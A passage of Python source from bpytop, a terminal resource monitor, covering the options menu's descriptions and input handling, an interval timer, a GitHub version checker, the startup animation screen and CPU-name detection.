                'User themes are prefixed by a plus sign "+".',
                '',
                'For theme updates see:',
                'https://github.com/aristocratos/bpytop'],
            "theme_background" : [
                'If the theme set background should be shown.',
                '',
                'Set to False if you want terminal background',
                'transparency.'],
            "truecolor" : [
                'Sets if 24-bit truecolor should be used.',
                '(Requires restart to take effect!)',
                '',
                'Will convert 24-bit colors to 256 color',
                '(6x6x6 color cube) if False.',
                '',
                'Set to False if your terminal doesn\'t have',
                'truecolor support and can\'t convert to',
                '256-color.'],
            "shown_boxes" : [
                'Manually set which boxes to show.',
                '',
                'Available values are "cpu mem net proc".',
                'Seperate values with whitespace.',
                '',
                'Toggle between presets with mode key "m".'],
            "update_ms" : [
                'Update time in milliseconds.',
                '',
                'Recommended 2000 ms or above for better sample',
                'times for graphs.',
                '',
                'Min value: 100 ms',
                'Max value: 86400000 ms = 24 hours.'],
            "draw_clock" : [
                'Draw a clock at top of screen.',
                '(Only visible if cpu box is enabled!)',
                '',
                'Formatting according to strftime, empty',
                'string to disable.',
                '',
                'Custom formatting options:',
                '"/host" = hostname',
                '"/user" = username',
                '"/uptime" = system uptime',
                '',
                'Examples of strftime formats:',
                '"%X" = locale HH:MM:SS',
                '"%H" = 24h hour, "%I" = 12h hour',
                '"%M" = minute, "%S" = second',
                '"%d" = day, "%m" = month, "%y" = year'],
            "background_update" : [
                'Update main ui when menus are showing.',
                '',
                'True or False.',
                '',
                'Set this to false if the menus is flickering',
                'too much for a comfortable experience.'],
            "show_battery" : [
                'Show battery stats.',
                '(Only visible if cpu box is enabled!)',
                '',
                'Show battery stats in the top right corner',
                'if a battery is present.'],
            "show_init" : [
                'Show init screen at startup.',
                '',
                'The init screen is purely cosmetical and',
                'slows down start to show status messages.'],
            "update_check" : [
                'Check for updates at start.',
                '',
                'Checks for latest version from:',
                'https://github.com/aristocratos/bpytop'],
            "log_level" : [
                'Set loglevel for error.log',
                '',
                'Levels are: "ERROR" "WARNING" "INFO" "DEBUG".',
                'The level set includes all lower levels,',
                'i.e. "DEBUG" will show all logging info.']
            },
        "cpu" : {
            "cpu_graph_upper" : [
                'Sets the CPU stat shown in upper half of',
                'the CPU graph.',
                '',
                '"total" = Total cpu usage.',
                '"user" = User mode cpu usage.',
                '"system" = Kernel mode cpu usage.',
                'See:',
                'https://psutil.readthedocs.io/en/latest/',
                '#psutil.cpu_times',
                'for attributes available on specific platforms.'],
            "cpu_graph_lower" : [
                'Sets the CPU stat shown in lower half of',
                'the CPU graph.',
                '',
                '"total" = Total cpu usage.',
                '"user" = User mode cpu usage.',
                '"system" = Kernel mode cpu usage.',
                'See:',
                'https://psutil.readthedocs.io/en/latest/',
                '#psutil.cpu_times',
                'for attributes available on specific platforms.'],
            "cpu_invert_lower" : [
                'Toggles orientation of the lower CPU graph.',
                '',
                'True or False.'],
            "cpu_single_graph" : [
                'Completely disable the lower CPU graph.',
                '',
                'Shows only upper CPU graph and resizes it',
                'to fit to box height.',
                '',
                'True or False.'],
            "check_temp" : [
                'Enable cpu temperature reporting.',
                '',
                'True or False.'],
            "cpu_sensor" : [
                'Cpu temperature sensor',
                '',
                'Select the sensor that corresponds to',
                'your cpu temperature.',
                'Set to "Auto" for auto detection.'],
            "show_coretemp" : [
                'Show temperatures for cpu cores.',
                '',
                'Only works if check_temp is True and',
                'the system is reporting core temps.'],
            "temp_scale" : [
                'Which temperature scale to use.',
                '',
                'Celsius, default scale.',
                '',
                'Fahrenheit, the american one.',
                '',
                'Kelvin, 0 = absolute zero, 1 degree change',
                'equals 1 degree change in Celsius.',
                '',
                'Rankine, 0 = abosulte zero, 1 degree change',
                'equals 1 degree change in Fahrenheit.'],
            "show_cpu_freq" : [
                'Show CPU frequency',
                '',
                'Can cause slowdowns on systems with many',
                'cores and psutil versions below 5.8.1'],
            "custom_cpu_name" : [
                'Custom cpu model name in cpu percentage box.',
                '',
                'Empty string to disable.'],
            "show_uptime" : [
                'Shows the system uptime in the CPU box.',
                '',
                'Can also be shown in the clock by using',
                '"/uptime" in the formatting.',
                '',
                'True or False.'],
            },
        "mem" : {
            "mem_graphs" : [
                'Show graphs for memory values.',
                '',
                'True or False.'],
            "show_disks" : [
                'Split memory box to also show disks.',
                '',
                'True or False.'],
            "show_io_stat" : [
                'Toggle small IO stat graphs.',
                '',
                'Toggles the small IO graphs for the regular',
                'disk usage view.',
                '',
                'True or False.'],
            "io_mode" : [
                'Toggles io mode for disks.',
                '',
                'Shows big graphs for disk read/write speeds',
                'instead of used/free percentage meters.',
                '',
                'True or False.'],
            "io_graph_combined" : [
                'Toggle combined read and write graphs.',
                '',
                'Only has effect if "io mode" is True.',
                '',
                'True or False.'],
            "io_graph_speeds" : [
                'Set top speeds for the io graphs.',
                '',
                'Manually set which speed in MiB/s that equals',
                '100 percent in the io graphs.',
                '(10 MiB/s by default).',
                '',
                'Format: "device:speed" seperate disks with a',
                'comma ",".',
                '',
                'Example: "/dev/sda:100, /dev/sdb:20".'],
            "show_swap" : [
                'If swap memory should be shown in memory box.',
                '',
                'True or False.'],
            "swap_disk" : [
                'Show swap as a disk.',
                '',
                'Ignores show_swap value above.',
                'Inserts itself after first disk.'],
            "only_physical" : [
                'Filter out non physical disks.',
                '',
                'Set this to False to include network disks,',
                'RAM disks and similar.',
                '',
                'True or False.'],
            "use_fstab" : [
                'Read disks list from /etc/fstab.',
                '(Has no effect on macOS X)',
                '',
                'This also disables only_physical.',
                '',
                'True or False.'],
            "disks_filter" : [
                'Optional filter for shown disks.',
                '',
                'Should be full path of a mountpoint,',
                '"root" replaces "/", separate multiple values',
                'with a comma ",".',
                'Begin line with "exclude=" to change to exclude',
                'filter.',
                'Oterwise defaults to "most include" filter.',
                '',
                'Example: disks_filter="exclude=/boot, /home/user"'],
            },
        "net" : {
            "net_download" : [
                'Fixed network graph download value.',
                '',
                'Default "10M" = 10 MibiBytes.',
                'Possible units:',
                '"K" (KiB), "M" (MiB), "G" (GiB).',
                '',
                'Append "bit" for bits instead of bytes,',
                'i.e "100Mbit"',
                '',
                'Can be toggled with auto button.'],
            "net_upload" : [
                'Fixed network graph upload value.',
                '',
                'Default "10M" = 10 MibiBytes.',
                'Possible units:',
                '"K" (KiB), "M" (MiB), "G" (GiB).',
                '',
                'Append "bit" for bits instead of bytes,',
                'i.e "100Mbit"',
                '',
                'Can be toggled with auto button.'],
            "net_auto" : [
                'Start in network graphs auto rescaling mode.',
                '',
                'Ignores any values set above at start and',
                'rescales down to 10KibiBytes at the lowest.',
                '',
                'True or False.'],
            "net_sync" : [
                'Network scale sync.',
                '',
                'Syncs the scaling for download and upload to',
                'whichever currently has the highest scale.',
                '',
                'True or False.'],
            "net_color_fixed" : [
                'Set network graphs color gradient to fixed.',
                '',
                'If True the network graphs color is based',
                'on the total bandwidth usage instead of',
                'the current autoscaling.',
                '',
                'The bandwidth usage is based on the',
                '"net_download" and "net_upload" values set',
                'above.'],
            "net_iface" : [
                'Network Interface.',
                '',
                'Manually set the starting Network Interface.',
                'Will otherwise automatically choose the NIC',
                'with the highest total download since boot.'],
            },
        "proc" : {
            "proc_update_mult" : [
                'Processes update multiplier.',
                'Sets how often the process list is updated as',
                'a multiplier of "update_ms".',
                '',
                'Set to 2 or higher to greatly decrease bpytop',
                'cpu usage. (Only integers)'],
            "proc_sorting" : [
                'Processes sorting option.',
                '',
                'Possible values: "pid", "program", "arguments",',
                '"threads", "user", "memory", "cpu lazy" and',
                '"cpu responsive".',
                '',
                '"cpu lazy" updates top process over time,',
                '"cpu responsive" updates top process directly.'],
            "proc_reversed" : [
                'Reverse processes sorting order.',
                '',
                'True or False.'],
            "proc_tree" : [
                'Processes tree view.',
                '',
                'Set true to show processes grouped by parents,',
                'with lines drawn between parent and child',
                'process.'],
            "tree_depth" : [
                'Process tree auto collapse depth.',
                '',
                'Sets the depth where the tree view will auto',
                'collapse processes at.'],
            "proc_colors" : [
                'Enable colors in process view.',
                '',
                'Uses the cpu graph gradient colors.'],
            "proc_gradient" : [
                'Enable process view gradient fade.',
                '',
                'Fades from top or current selection.',
                'Max fade value is equal to current themes',
                '"inactive_fg" color value.'],
            "proc_per_core" : [
                'Process usage per core.',
                '',
                'If process cpu usage should be of the core',
                'it\'s running on or usage of the total',
                'available cpu power.',
                '',
                'If true and process is multithreaded',
                'cpu usage can reach over 100%.'],
            "proc_mem_bytes" : [
                'Show memory as bytes in process list.',
                ' ',
                'True or False.'],
            }
        }
    # Current index into each multi-choice option's value list.
    loglevel_i: int = CONFIG.log_levels.index(CONFIG.log_level)
    cpu_sensor_i: int = CONFIG.cpu_sensors.index(CONFIG.cpu_sensor)
    cpu_graph_i: Dict[str, int] = { "cpu_graph_upper" : CONFIG.cpu_percent_fields.index(CONFIG.cpu_graph_upper),
                                    "cpu_graph_lower" : CONFIG.cpu_percent_fields.index(CONFIG.cpu_graph_lower)}
    temp_scale_i: int = CONFIG.temp_scales.index(CONFIG.temp_scale)
    color_i: int
    max_opt_len: int = max([len(categories[x]) for x in categories]) * 2
    cat_list = list(categories)
    while not cls.close:
        key = ""
        # Recompute layout after a terminal resize or a category tab switch.
        if cls.resized or change_cat:
            cls.resized = change_cat = False
            selected_cat = list(categories)[cat_int]
            option_items = categories[cat_list[cat_int]]
            option_len: int = len(option_items) * 2
            y = 12 if Term.height < max_opt_len + 13 else Term.height // 2 - max_opt_len // 2 + 7
            out_misc = (f'{Banner.draw(y-10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
                f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
            x = Term.width//2-38
            x2 = x + 27
            h, w, w2 = min(Term.height-1-y, option_len), 26, 50
            h -= h % 2
            color_i = list(Theme.themes).index(THEME.current)
            out_misc += create_box(x, y - 3, w+w2+1, 3, f'tab{Symbol.right}', line_color=THEME.div_line)
            out_misc += create_box(x, y, w, h+2, "options", line_color=THEME.div_line)
            redraw = True
            # Category tab bar with the active tab highlighted.
            cat_width = floor((w+w2) / len(categories))
            out_misc += f'{Fx.b}'
            for cx, cat in enumerate(categories):
                out_misc += f'{Mv.to(y-2, x + 1 + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 ))}'
                if cat == selected_cat:
                    out_misc += f'{THEME.hi_fg}[{THEME.title}{Fx.u}{cat}{Fx.uu}{THEME.hi_fg}]'
                else:
                    out_misc += f'{THEME.hi_fg}{SUPERSCRIPT[cx+1]}{THEME.title}{cat}'
            out_misc += f'{Fx.ub}'
            if option_len > h:
                pages = ceil(option_len / h)
            else:
                h = option_len
                pages = 0
            page = pages if selected_int == -1 and pages > 0 else 1
            selected_int = 0 if selected_int >= 0 else len(option_items) - 1
        # Render the option list plus the description box for the selection.
        if redraw:
            out = ""
            cy = 0
            selected = list(option_items)[selected_int]
            if pages:
                out += (f'{Mv.to(y+h+1, x+11)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
                    f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
            #out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
            for n, opt in enumerate(option_items):
                if pages and n < (page - 1) * ceil(h / 2): continue
                value = getattr(CONFIG, opt)
                t_color = f'{THEME.selected_bg}{THEME.selected_fg}' if opt == selected else f'{THEME.title}'
                v_color = "" if opt == selected else f'{THEME.title}'
                d_quote = '"' if isinstance(value, str) else ""
                # Multi-choice options get a "current/total" counter suffix.
                if opt == "color_theme":
                    counter = f' {color_i + 1}/{len(Theme.themes)}'
                elif opt == "proc_sorting":
                    counter = f' {CONFIG.sorting_options.index(CONFIG.proc_sorting) + 1}/{len(CONFIG.sorting_options)}'
                elif opt == "log_level":
                    counter = f' {loglevel_i + 1}/{len(CONFIG.log_levels)}'
                elif opt == "cpu_sensor":
                    counter = f' {cpu_sensor_i + 1}/{len(CONFIG.cpu_sensors)}'
                elif opt in ["cpu_graph_upper", "cpu_graph_lower"]:
                    counter = f' {cpu_graph_i[opt] + 1}/{len(CONFIG.cpu_percent_fields)}'
                elif opt == "temp_scale":
                    counter = f' {temp_scale_i + 1}/{len(CONFIG.temp_scales)}'
                else:
                    counter = ""
                out += f'{Mv.to(y+1+cy, x+1)}{t_color}{Fx.b}{opt.replace("_", " ").capitalize() + counter:^24.24}{Fx.ub}{Mv.to(y+2+cy, x+1)}{v_color}'
                if opt == selected:
                    if isinstance(value, bool) or opt in ["color_theme", "proc_sorting", "log_level", "cpu_sensor", "cpu_graph_upper", "cpu_graph_lower", "temp_scale"]:
                        out += f'{t_color} {Symbol.left}{v_color}{d_quote + str(value) + d_quote:^20.20}{t_color}{Symbol.right} '
                    elif inputting:
                        out += f'{str(input_val)[-17:] + Fx.bl + "█" + Fx.ubl + "" + Symbol.enter:^33.33}'
                    else:
                        out += ((f'{t_color} {Symbol.left}{v_color}' if type(value) is int else " ") +
                            f'{str(value) + " " + Symbol.enter:^20.20}' + (f'{t_color}{Symbol.right} ' if type(value) is int else " "))
                else:
                    out += f'{d_quote + str(value) + d_quote:^24.24}'
                out += f'{Term.bg}'
                if opt == selected:
                    # Description box follows the selected option, clamped to screen.
                    h2 = len(option_items[opt]) + 2
                    y2 = y + (selected_int * 2) - ((page-1) * h)
                    if y2 + h2 > Term.height: y2 = Term.height - h2
                    out += f'{create_box(x2, y2, w2, h2, "description", line_color=THEME.div_line)}{THEME.main_fg}'
                    for n, desc in enumerate(option_items[opt]):
                        out += f'{Mv.to(y2+1+n, x2+2)}{desc:.48}'
                cy += 2
                if cy >= h: break
            if cy < h:
                for i in range(h-cy):
                    out += f'{Mv.to(y+1+cy+i, x+1)}{" " * (w-2)}'
        if not skip or redraw:
            Draw.now(f'{cls.background}{out_misc}{out}')
        skip = redraw = False
        # Wait for keyboard/mouse input until the next collection tick.
        if Key.input_wait(Timer.left()):
            key = Key.get()
            redraw = True
            has_sel = False
            # Translate mouse clicks into equivalent key events.
            if key == "mouse_click" and not inputting:
                mx, my = Key.get_mouse()
                if x < mx < x + w + w2 and y - 4 < my < y:
                    # if my == y - 2:
                    for cx, cat in enumerate(categories):
                        ccx = x + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 )
                        if ccx - 2 < mx < ccx + 2 + len(cat):
                            key = str(cx+1)
                            break
                elif x < mx < x + w and y < my < y + h + 2:
                    mouse_sel = ceil((my - y) / 2) - 1 + ceil((page-1) * (h / 2))
                    if pages and my == y+h+1 and x+11 < mx < x+16:
                        key = "page_up"
                    elif pages and my == y+h+1 and x+19 < mx < x+24:
                        key = "page_down"
                    elif my == y+h+1:
                        pass
                    elif mouse_sel == selected_int:
                        if mx < x + 6:
                            key = "left"
                        elif mx > x + 19:
                            key = "right"
                        else:
                            key = "enter"
                    elif mouse_sel < len(option_items):
                        selected_int = mouse_sel
                        has_sel = True
                else:
                    key = "escape"
            # Text-input mode for free-form string/int options.
            if inputting:
                if key in ["escape", "mouse_click"]:
                    inputting = False
                elif key == "enter":
                    inputting = False
                    if str(getattr(CONFIG, selected)) != input_val:
                        if selected == "update_ms":
                            if not input_val or int(input_val) < 100:
                                CONFIG.update_ms = 100
                            elif int(input_val) > 86399900:
                                CONFIG.update_ms = 86399900
                            else:
                                CONFIG.update_ms = int(input_val)
                        elif selected == "proc_update_mult":
                            if not input_val or int(input_val) < 1:
                                CONFIG.proc_update_mult = 1
                            else:
                                CONFIG.proc_update_mult = int(input_val)
                            Collector.proc_counter = 1
                        elif selected == "tree_depth":
                            if not input_val or int(input_val) < 0:
                                CONFIG.tree_depth = 0
                            else:
                                CONFIG.tree_depth = int(input_val)
                            ProcCollector.collapsed = {}
                        elif selected == "shown_boxes":
                            new_boxes: List = []
                            for box in input_val.split():
                                if box in ["cpu", "mem", "net", "proc"]:
                                    new_boxes.append(box)
                            CONFIG.shown_boxes = " ".join(new_boxes)
                            Box.view_mode = "user"
                            Box.view_modes["user"] = CONFIG.shown_boxes.split()
                            Draw.clear(saved=True)
                        elif isinstance(getattr(CONFIG, selected), str):
                            setattr(CONFIG, selected, input_val)
                            if selected.startswith("net_"):
                                NetCollector.net_min = {"download" : -1, "upload" : -1}
                            elif selected == "draw_clock":
                                Box.clock_on = len(CONFIG.draw_clock) > 0
                                if not Box.clock_on: Draw.clear("clock", saved=True)
                            elif selected == "io_graph_speeds":
                                MemBox.graph_speeds = {}
                        Term.refresh(force=True)
                        cls.resized = False
                elif key == "backspace" and len(input_val):
                    input_val = input_val[:-1]
                elif key == "delete":
                    input_val = ""
                elif isinstance(getattr(CONFIG, selected), str) and len(key) == 1:
                    input_val += key
                elif isinstance(getattr(CONFIG, selected), int) and key.isdigit():
                    input_val += key
            elif key == "q":
                clean_quit()
            elif key in ["escape", "o", "M", "f2"]:
                cls.close = True
                break
            # Tab / shift_tab (or wrapping up/down) cycles category tabs.
            elif key == "tab" or (key == "down" and selected_int == len(option_items) - 1 and (page == pages or pages == 0)):
                if cat_int == len(categories) - 1:
                    cat_int = 0
                else:
                    cat_int += 1
                change_cat = True
            elif key == "shift_tab" or (key == "up" and selected_int == 0 and page == 1):
                if cat_int == 0:
                    cat_int = len(categories) - 1
                else:
                    cat_int -= 1
                change_cat = True
                selected_int = -1 if key != "shift_tab" else 0
            elif key in list(map(str, range(1, len(cat_list)+1))) and key != str(cat_int + 1):
                cat_int = int(key) - 1
                change_cat = True
            elif key == "enter" and selected in ["update_ms", "disks_filter", "custom_cpu_name", "net_download",
                "net_upload", "draw_clock", "tree_depth", "proc_update_mult", "shown_boxes", "net_iface", "io_graph_speeds"]:
                inputting = True
                input_val = str(getattr(CONFIG, selected))
            elif key == "left" and selected == "update_ms" and CONFIG.update_ms - 100 >= 100:
                CONFIG.update_ms -= 100
                Box.draw_update_ms()
            elif key == "right" and selected == "update_ms" and CONFIG.update_ms + 100 <= 86399900:
                CONFIG.update_ms += 100
                Box.draw_update_ms()
            elif key == "left" and selected == "proc_update_mult" and CONFIG.proc_update_mult > 1:
                CONFIG.proc_update_mult -= 1
                Collector.proc_counter = 1
            elif key == "right" and selected == "proc_update_mult":
                CONFIG.proc_update_mult += 1
                Collector.proc_counter = 1
            elif key == "left" and selected == "tree_depth" and CONFIG.tree_depth > 0:
                CONFIG.tree_depth -= 1
                ProcCollector.collapsed = {}
            elif key == "right" and selected == "tree_depth":
                CONFIG.tree_depth += 1
                ProcCollector.collapsed = {}
            elif key in ["left", "right"] and isinstance(getattr(CONFIG, selected), bool):
                # Boolean toggle; some options need extra side effects applied.
                setattr(CONFIG, selected, not getattr(CONFIG, selected))
                if selected == "check_temp":
                    if CONFIG.check_temp:
                        CpuCollector.get_sensors()
                    else:
                        CpuCollector.sensor_method = ""
                        CpuCollector.got_sensors = False
                if selected in ["net_auto", "net_color_fixed", "net_sync"]:
                    if selected == "net_auto": NetCollector.auto_min = CONFIG.net_auto
                    NetBox.redraw = True
                if selected == "theme_background":
                    Term.bg = f'{THEME.main_bg}' if CONFIG.theme_background else "\033[49m"
                    Draw.now(Term.bg)
                if selected == "show_battery":
                    Draw.clear("battery", saved=True)
                Term.refresh(force=True)
                cls.resized = False
            elif key in ["left", "right"] and selected == "color_theme" and len(Theme.themes) > 1:
                if key == "left":
                    color_i -= 1
                    if color_i < 0: color_i = len(Theme.themes) - 1
                elif key == "right":
                    color_i += 1
                    if color_i > len(Theme.themes) - 1: color_i = 0
                Collector.collect_idle.wait()
                CONFIG.color_theme = list(Theme.themes)[color_i]
                THEME(CONFIG.color_theme)
                Term.refresh(force=True)
                Timer.finish()
            elif key in ["left", "right"] and selected == "proc_sorting":
                ProcCollector.sorting(key)
            elif key in ["left", "right"] and selected == "log_level":
                if key == "left":
                    loglevel_i -= 1
                    if loglevel_i < 0: loglevel_i = len(CONFIG.log_levels) - 1
                elif key == "right":
                    loglevel_i += 1
                    if loglevel_i > len(CONFIG.log_levels) - 1: loglevel_i = 0
                CONFIG.log_level = CONFIG.log_levels[loglevel_i]
                errlog.setLevel(getattr(logging, CONFIG.log_level))
                errlog.info(f'Loglevel set to {CONFIG.log_level}')
            elif key in ["left", "right"] and selected in ["cpu_graph_upper", "cpu_graph_lower"]:
                if key == "left":
                    cpu_graph_i[selected] -= 1
                    if cpu_graph_i[selected] < 0: cpu_graph_i[selected] = len(CONFIG.cpu_percent_fields) - 1
                if key == "right":
                    cpu_graph_i[selected] += 1
                    if cpu_graph_i[selected] > len(CONFIG.cpu_percent_fields) - 1: cpu_graph_i[selected] = 0
                setattr(CONFIG, selected, CONFIG.cpu_percent_fields[cpu_graph_i[selected]])
                setattr(CpuCollector, selected.replace("_graph", ""), [])
                Term.refresh(force=True)
                cls.resized = False
            elif key in ["left", "right"] and selected == "temp_scale":
                if key == "left":
                    temp_scale_i -= 1
                    if temp_scale_i < 0: temp_scale_i = len(CONFIG.temp_scales) - 1
                if key == "right":
                    temp_scale_i += 1
                    if temp_scale_i > len(CONFIG.temp_scales) - 1: temp_scale_i = 0
                CONFIG.temp_scale = CONFIG.temp_scales[temp_scale_i]
                Term.refresh(force=True)
                cls.resized = False
            elif key in ["left", "right"] and selected == "cpu_sensor" and len(CONFIG.cpu_sensors) > 1:
                if key == "left":
                    cpu_sensor_i -= 1
                    if cpu_sensor_i < 0: cpu_sensor_i = len(CONFIG.cpu_sensors) - 1
                elif key == "right":
                    cpu_sensor_i += 1
                    if cpu_sensor_i > len(CONFIG.cpu_sensors) - 1: cpu_sensor_i = 0
                Collector.collect_idle.wait()
                CpuCollector.sensor_swap = True
                CONFIG.cpu_sensor = CONFIG.cpu_sensors[cpu_sensor_i]
                if CONFIG.check_temp and (CpuCollector.sensor_method != "psutil" or CONFIG.cpu_sensor == "Auto"):
                    CpuCollector.get_sensors()
                Term.refresh(force=True)
                cls.resized = False
            elif key in ["up", "mouse_scroll_up"]:
                selected_int -= 1
                if selected_int < 0: selected_int = len(option_items) - 1
                page = floor(selected_int * 2 / h) + 1
            elif key in ["down", "mouse_scroll_down"]:
                selected_int += 1
                if selected_int > len(option_items) - 1: selected_int = 0
                page = floor(selected_int * 2 / h) + 1
            elif key == "page_up":
                if not pages or page == 1:
                    selected_int = 0
                else:
                    page -= 1
                    if page < 1: page = pages
                    selected_int = (page-1) * ceil(h / 2)
            elif key == "page_down":
                if not pages or page == pages:
                    selected_int = len(option_items) - 1
                else:
                    page += 1
                    if page > pages: page = 1
                    selected_int = (page-1) * ceil(h / 2)
            elif has_sel:
                pass
            else:
                redraw = False
        # Keep collecting/updating the background UI on the normal timer.
        if Timer.not_zero() and not cls.resized:
            skip = True
        else:
            Collector.collect()
            Collector.collect_done.wait(2)
            if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
            Timer.stamp()
    if main_active:
        cls.close = False
        return
    Draw.now(f'{Draw.saved_buffer()}')
    cls.background = ""
    cls.active = False
    cls.close = False
class Timer:
    """Tracks the update interval between UI refresh/collection cycles."""
    timestamp: float        # start of the current interval (set by stamp())
    return_zero = False     # one-shot flag forcing the next not_zero() to report expired

    @classmethod
    def _deadline(cls) -> float:
        # Point in time at which the current update interval ends.
        return cls.timestamp + CONFIG.update_ms / 1000

    @classmethod
    def stamp(cls):
        """Mark the beginning of a new update interval."""
        cls.timestamp = time()

    @classmethod
    def not_zero(cls) -> bool:
        """Return True while the current interval still has time left."""
        if not cls.return_zero:
            return time() < cls._deadline()
        cls.return_zero = False
        return False

    @classmethod
    def left(cls) -> float:
        """Seconds remaining in the current interval (negative when overdue)."""
        return cls._deadline() - time()

    @classmethod
    def finish(cls):
        """Force the interval to expire immediately and wake the input wait."""
        cls.return_zero = True
        cls.timestamp = time() - CONFIG.update_ms / 1000
        Key.break_wait()
class UpdateChecker:
    """Background check for a newer bpytop release on GitHub."""
    version: str = VERSION          # latest version string found upstream
    thread: threading.Thread

    @classmethod
    def run(cls):
        """Start the version check in a daemon-style worker thread."""
        cls.thread = threading.Thread(target=cls._checker)
        cls.thread.start()

    @classmethod
    def _checker(cls):
        """Scrape the VERSION line from the upstream script; notify if it differs."""
        try:
            with urllib.request.urlopen("https://github.com/aristocratos/bpytop/raw/master/bpytop.py", timeout=5) as source: # type: ignore
                for raw_line in source:
                    decoded = raw_line.decode("utf-8")
                    if not decoded.startswith("VERSION: str ="):
                        continue
                    cls.version = decoded[(decoded.index("=")+1):].strip('" \n')
                    break
        except Exception as e:
            errlog.exception(f'{e}')
            return
        # Only notify when a different version exists and notify-send is available.
        if cls.version == VERSION or not which("notify-send"):
            return
        try:
            subprocess.run(["notify-send", "-u", "normal", "BpyTop Update!",
                f'New version of BpyTop available!\nCurrent version: {VERSION}\nNew version: {cls.version}\nDownload at github.com/aristocratos/bpytop',
                "-i", "update-notifier", "-t", "10000"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        except Exception as e:
            errlog.exception(f'{e}')
class Init:
    """Draws and manages the animated startup (init) screen."""
    running: bool = True
    initbg_colors: List[str] = []   # grayscale gradient used by the background graphs
    initbg_data: List[int]          # random data feeding the background graphs
    initbg_up: Graph
    initbg_down: Graph
    resized = False

    @classmethod
    def start(cls):
        """Set up the init screen buffers: banner, progress markers and background graphs."""
        Draw.buffer("init", z=1)
        Draw.buffer("initbg", z=10)
        # Build a 102-entry grayscale gradient (each of 51 levels twice).
        for i in range(51):
            for _ in range(2): cls.initbg_colors.append(Color.fg(i, i, i))
        Draw.buffer("banner", (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(11)}{Colors.black_bg}{Colors.default}'
            f'{Fx.b}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}{Color.fg("#50")}'), z=2)
        # Percentage markers down the left side of the status column.
        for _i in range(7):
            perc = f'{str(round((_i + 1) * 14 + 2)) + "%":>5}'
            Draw.buffer("+banner", f'{Mv.to(Term.height // 2 - 2 + _i, Term.width // 2 - 28)}{Fx.trans(perc)}{Symbol.v_line}')
        Draw.out("banner")
        Draw.buffer("+init!", f'{Color.fg("#cc")}{Fx.b}{Mv.to(Term.height // 2 - 2, Term.width // 2 - 21)}{Mv.save}')
        cls.initbg_data = [randint(0, 100) for _ in range(Term.width * 2)]
        cls.initbg_up = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=True)
        cls.initbg_down = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=False)

    @classmethod
    def success(cls):
        """Mark the current init step as succeeded and advance the status cursor."""
        if not CONFIG.show_init or cls.resized: return
        cls.draw_bg(5)
        Draw.buffer("+init!", f'{Mv.restore}{Symbol.ok}\n{Mv.r(Term.width // 2 - 22)}{Mv.save}')

    @staticmethod
    def fail(err):
        """Mark the current init step as failed, log the error and quit."""
        if CONFIG.show_init:
            Draw.buffer("+init!", f'{Mv.restore}{Symbol.fail}')
            sleep(2)
        errlog.exception(f'{err}')
        clean_quit(1, errmsg=f'Error during init! See {CONFIG_DIR}/error.log for more information.')

    @classmethod
    def draw_bg(cls, times: int = 5):
        """Animate the background graphs for *times* frames (50 ms per frame)."""
        for _ in range(times):
            sleep(0.05)
            x = randint(0, 100)
            Draw.buffer("initbg", f'{Fx.ub}{Mv.to(0, 0)}{cls.initbg_up(x)}{Mv.to(Term.height // 2, 0)}{cls.initbg_down(x)}')
            Draw.out("initbg", "banner", "init")

    @classmethod
    def done(cls):
        """Tear down the init screen and release its buffers and data."""
        cls.running = False
        if not CONFIG.show_init: return
        if cls.resized:
            Draw.now(Term.clear)
        else:
            cls.draw_bg(10)
        Draw.clear("initbg", "banner", "init", saved=True)
        if cls.resized: return
        # Free the animation data; it is never needed again after init.
        del cls.initbg_up, cls.initbg_down, cls.initbg_data, cls.initbg_colors
#? Functions ------------------------------------------------------------------------------------->
def get_cpu_name() -> str:
    '''Fetch a suitable CPU identifier from the CPU model name string

    Probes the platform-specific source (/proc/cpuinfo, sysctl), then trims
    vendor noise (trademarks, frequency, "CPU"/"Processor") down to a short
    model name. Returns an empty string if nothing could be determined.
    '''
    name: str = ""
    nlist: List = []
    command: str = ""
    cmd_out: str = ""
    rem_line: str = ""
    if SYSTEM == "Linux":
        command = "cat /proc/cpuinfo"
        rem_line = "model name"
    elif SYSTEM == "MacOS":
        command ="sysctl -n machdep.cpu.brand_string"
    elif SYSTEM == "BSD":
        command ="sysctl hw.model"
        rem_line = "hw.model"
    try:
        cmd_out = subprocess.check_output("LANG=C " + command, shell=True, universal_newlines=True)
    except (subprocess.SubprocessError, OSError):
        # Probe command missing or failing: leave cmd_out empty (bare except
        # here previously also swallowed KeyboardInterrupt/SystemExit).
        pass
    if rem_line:
        for line in cmd_out.split("\n"):
            if rem_line in line:
                name = re.sub( ".*" + rem_line + ".*:", "", line,1).lstrip()
    else:
        name = cmd_out
    nlist = name.split(" ")
    try:
        # Reduce known vendor formats to the distinguishing model token(s).
        if "Xeon" in name and "CPU" in name:
            name = nlist[nlist.index("CPU")+(-1 if name.endswith(("CPU", "z")) else 1)]
        elif "Ryzen" in name:
            name = " ".join(nlist[nlist.index("Ryzen"):nlist.index("Ryzen")+3])
        elif "Duo" in name and "@" in name:
            name = " ".join(nlist[:nlist.index("@")])
        elif "CPU" in name and not nlist[0] == "CPU" and not nlist[nlist.index("CPU")-1].isdigit():
            name = nlist[nlist.index("CPU")-1]
    except (ValueError, IndexError):
        # list.index misses or short token lists: keep the unreduced name.
        pass
    name = name.replace("Processor", "").replace("CPU", "").replace("(R)", "").replace("(TM)", "").replace("Intel", "")
